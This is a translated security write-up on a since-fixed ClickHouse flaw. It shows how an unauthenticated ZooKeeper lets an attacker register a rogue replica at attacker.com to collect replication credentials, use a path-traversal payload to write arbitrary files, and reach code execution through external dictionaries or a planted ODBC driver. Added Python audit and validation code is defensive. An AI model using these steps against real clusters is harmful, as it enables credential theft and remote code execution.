Why you should close ZooKeeper

This article describes a serious vulnerability in the ClickHouse replication mechanism and shows how the attack surface can be widened from there.

ClickHouse is a database for storing large volumes of data, and it is most often run with more than one replica. Clustering and replication in ClickHouse are built on top of Apache ZooKeeper (ZK) and require write access to it.

A default ZK installation requires no authentication, so thousands of ZK servers used to configure Kafka, Hadoop and ClickHouse are exposed to the public internet.

To reduce your attack surface, you should always configure authentication and authorization when deploying ZooKeeper.

There are some 0days based on Java deserialization, but let us simply assume that an attacker can read and write to the ZooKeeper used for ClickHouse replication.

When configured in cluster mode, ClickHouse supports distributed DDL queries that are passed through ZK: for them, nodes are created under /clickhouse/task_queue/ddl.

For example, if you create the node /clickhouse/task_queue/ddl/query-0001 with the content:

version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']

then the test table will be deleted on the cluster servers host1 and host2. The DDL queue supports running CREATE/ALTER/DROP queries.

Sounds scary? But where can an attacker get the server addresses?

ClickHouse replication works at the level of individual tables, so when a table is created, the server that will be responsible for exchanging metadata with the replicas is recorded in ZK. For example, when executing the query (ZK must be configured; chXX is the replica name, foobar is the table name):

CREATE TABLE foobar
(
    `action_id` UInt32 DEFAULT toUInt32(0),
    `status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;

the columns and metadata nodes will be created.

Contents of /clickhouse/tables/01/foobar/replicas/chXX/hosts:

host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Is it possible to pull data out of this cluster? Yes, if the replication port (TCP/9009) on the server chXX-address is not closed by a firewall and authentication for replication is not configured. So how is authentication bypassed?

The attacker can create a new replica in ZK by copying the contents of /clickhouse/tables/01-01/foobar/replicas/chXX and changing the value of host.

Contents of /clickhouse/tables/01-01/foobar/replicas/attacker/host:

host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Next, the other replicas have to be told that there is a new block of data on the attacker's server that they should fetch. For this, a node is created in ZK at /clickhouse/tables/01-01/foobar/log/log-00000000XX (XX is a monotonically increasing counter, which must be greater than the last one in the event log):

format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2

where source replica is the name of the attacker's replica created in the previous step, block_id is the data block identifier, and get is the "get block" command (commands for the other operations exist as well).

Each replica then reads the new event from the log and goes to the attacker-controlled server to fetch the data block (the replication protocol is binary and runs over HTTP). The server attacker.com will receive the request:

POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX

where XXX is the authentication data for replication. In some cases this can be an account with access to the database through the main ClickHouse interface and the HTTP protocol. As you can see, the attack surface grows significantly because the ZooKeeper used for replication was left without authentication.
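A defender can detect the replica injection described above by auditing the replica and log nodes in ZooKeeper. The following added example (not code from the article) does that over constructed node contents in the formats shown; the table path, the "attacker" replica name and the inventory of known hosts are assumed, and in practice the strings would be fetched with a ZooKeeper client such as kazoo.

```python
import re

# Constructed ZooKeeper node contents in the formats the article shows: one
# legitimate replica (chXX), one injected replica, and a log entry that tells
# every replica to fetch a part from the injected one.
TABLE_PATH = "/clickhouse/tables/01-01/foobar"
ZK_NODES = {
    f"{TABLE_PATH}/replicas/chXX/host": (
        "host: chXX-address\nport: 9009\ntcp_port: 9000\n"
        "database: default\ntable: foobar\nscheme: http\n"),
    f"{TABLE_PATH}/replicas/attacker/host": (
        "host: attacker.com\nport: 9009\ntcp_port: 9000\n"
        "database: default\ntable: foobar\nscheme: http\n"),
    f"{TABLE_PATH}/log/log-0000000042": (
        "format version: 4\ncreate_time: 2019-07-31 09:37:42\n"
        "source replica: attacker\n"
        "block_id: all_7192349136365807998_13893666115934954449\n"
        "get\nall_0_0_2\n"),
}

# Hosts that really belong to the cluster (assumed inventory).
KNOWN_HOSTS = {"chXX-address"}


def parse_kv(text):
    """Parse 'key: value' lines (replica host node or log entry); bare lines are skipped."""
    out = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            out[key.strip()] = value.strip()
    return out


def audit_replicas(nodes, known_hosts, table_path=TABLE_PATH):
    """Return names of replicas whose host is not in the inventory."""
    pattern = re.compile(re.escape(table_path) + r"/replicas/([^/]+)/host$")
    rogue = []
    for path, content in nodes.items():
        m = pattern.match(path)
        if m and parse_kv(content).get("host") not in known_hosts:
            rogue.append(m.group(1))
    return sorted(rogue)


def audit_log(nodes, rogue_replicas, table_path=TABLE_PATH):
    """Return (log path, source replica) for entries pointing at a rogue replica."""
    prefix = f"{table_path}/log/"
    hits = []
    for path, content in nodes.items():
        if path.startswith(prefix):
            entry = parse_kv(content)
            if entry.get("source replica") in rogue_replicas:
                hits.append((path, entry["source replica"]))
    return sorted(hits)
```

Run both audits periodically against each replicated table; a hit means a replica or log entry was written to ZK by someone other than the cluster itself.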

Let us look at the function that fetches a data block from a replica, written in the confident belief that all replicas are under control and can be trusted.

(Image: replication handler code)

The function reads a list of files, then their names, sizes and contents, and writes them to the file system. It is worth describing separately how data is stored on the file system.

There are several subdirectories in /var/lib/clickhouse (the default directory from the config file):

flags - directory for flag files, used in recovery after data loss;
tmp - directory for temporary files;
user_files - file operations in queries are restricted to this directory (INTO OUTFILE and others);
metadata - sql files with table definitions;
preprocessed_configs - processed configuration files from /etc/clickhouse-server;
data - the directory with the data itself; a separate subdirectory is created here for every database (for example /var/lib/clickhouse/data/default).

For each table, a subdirectory is created in the database directory. Each column is a separate file, depending on the engine format. For example, for the table foobar created by the attacker, the following files are created:

action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2

When processing a data block, the replica expects to receive files with these same names and does not validate them in any way.

The attentive reader has probably already noticed the unsafe concatenation of file_name in the WriteBufferFromFile call. Yes, this allows an attacker to write arbitrary content to any file on the FS with the permissions of the clickhouse user. To do so, the attacker-controlled replica must return the following response to the request (line breaks added for readability):

\x01
\x00\x00\x00\x00\x00\x00\x00\x24
../../../../../../../../../tmp/pwned
\x12\x00\x00\x00\x00\x00\x00\x00
hellofromzookeeper

and after the concatenation with ../../../../../../../../../tmp/pwned, the file /tmp/pwned is written with the content hellofromzookeeper.
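As an added example (Python, not ClickHouse's own code): a parser for the replica response in the layout the bytes above imply, assumed here to be an 8-byte little-endian file count followed, per file, by a varint-prefixed name, an 8-byte little-endian size and the content, together with the check a receiving replica should apply before writing: a part file name must be a bare name that resolves inside the part directory.

```python
import os
import struct


def read_varuint(buf, pos):
    """Decode a LEB128 varint (the length prefix used for strings); return (value, new_pos)."""
    value, shift = 0, 0
    while True:
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if byte < 0x80:
            return value, pos
        shift += 7


def parse_part_response(buf):
    """Return (file_name, content) pairs from a DataPartsExchange-style body.

    Assumed layout (not taken from ClickHouse sources): u64 little-endian file
    count, then per file a varint-prefixed name, a u64 LE size and the bytes.
    """
    count = struct.unpack_from("<Q", buf, 0)[0]
    pos, files = 8, []
    for _ in range(count):
        name_len, pos = read_varuint(buf, pos)
        name = buf[pos:pos + name_len].decode()
        pos += name_len
        size = struct.unpack_from("<Q", buf, pos)[0]
        pos += 8
        files.append((name, buf[pos:pos + size]))
        pos += size
    return files


def safe_part_path(part_dir, file_name):
    """Return the destination path, or None if file_name would escape part_dir."""
    # A part file is a bare name such as columns.txt: no separators, no dot-dirs.
    if not file_name or "/" in file_name or "\\" in file_name or file_name in (".", ".."):
        return None
    base = os.path.realpath(part_dir)
    dest = os.path.realpath(os.path.join(base, file_name))
    # Rejects anything that still leaves the directory, e.g. via a symlinked name.
    return dest if os.path.dirname(dest) == base else None


# Constructed replica response reproducing the traversal shown above
# (the name and content lengths come out to 0x24 and 0x12 bytes).
EVIL_NAME, EVIL_CONTENT = b"../../../../../../../../../tmp/pwned", b"hellofromzookeeper"
EVIL_RESPONSE = (struct.pack("<Q", 1) + bytes([len(EVIL_NAME)]) + EVIL_NAME
                 + struct.pack("<Q", len(EVIL_CONTENT)) + EVIL_CONTENT)
```

Applying safe_part_path to every name returned by parse_part_response before opening a WriteBufferFromFile is the kind of check the vulnerable handler lacked.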

There are several options for turning an arbitrary file write into remote code execution (RCE).

External dictionaries to RCE

In older versions, the directory with the ClickHouse configuration was stored with the permissions of the default database user. The config files are XML files that the service reads at startup and then caches in /var/lib/clickhouse/preprocessed_configs; when they change, they are re-read. With write access to /etc/clickhouse-server, an attacker can create their own external dictionary of the executable type and run arbitrary code. Current ClickHouse versions do not grant these permissions by default, but if a server has been upgraded step by step, such permissions may still be in place. If you maintain a ClickHouse cluster, check the permissions on the configuration directory: it must belong to the root user.

ODBC to RCE

When the package is installed, the clickhouse user is created, but its home directory /nonexistent is not. However, when using external dictionaries, or for other reasons, administrators create the /nonexistent directory and give the clickhouse user write access to it (SSZB! Translator's note.).

ClickHouse supports ODBC and can connect to other databases. In ODBC you can specify the path to the database driver library (.so). Older ClickHouse versions allowed this directly in the request handler, but a stricter check of the connection string has since been added to odbc-bridge, so the driver path can no longer be specified from the request. But can the attacker use the vulnerability described above to write into the home directory?

Let us create the file ~/.odbc.ini with the following content:

[lalala]
Driver=/var/lib/clickhouse/user_files/test.so

then, on running SELECT * FROM odbc('DSN=lalala', 'test', 'test'); the library test.so is loaded and we get RCE (thanks to bugloc for the tip).

These and other vulnerabilities were fixed in ClickHouse version 19.14.3. Take care of your ClickHouse and your ZooKeepers!

Source: www.habr.com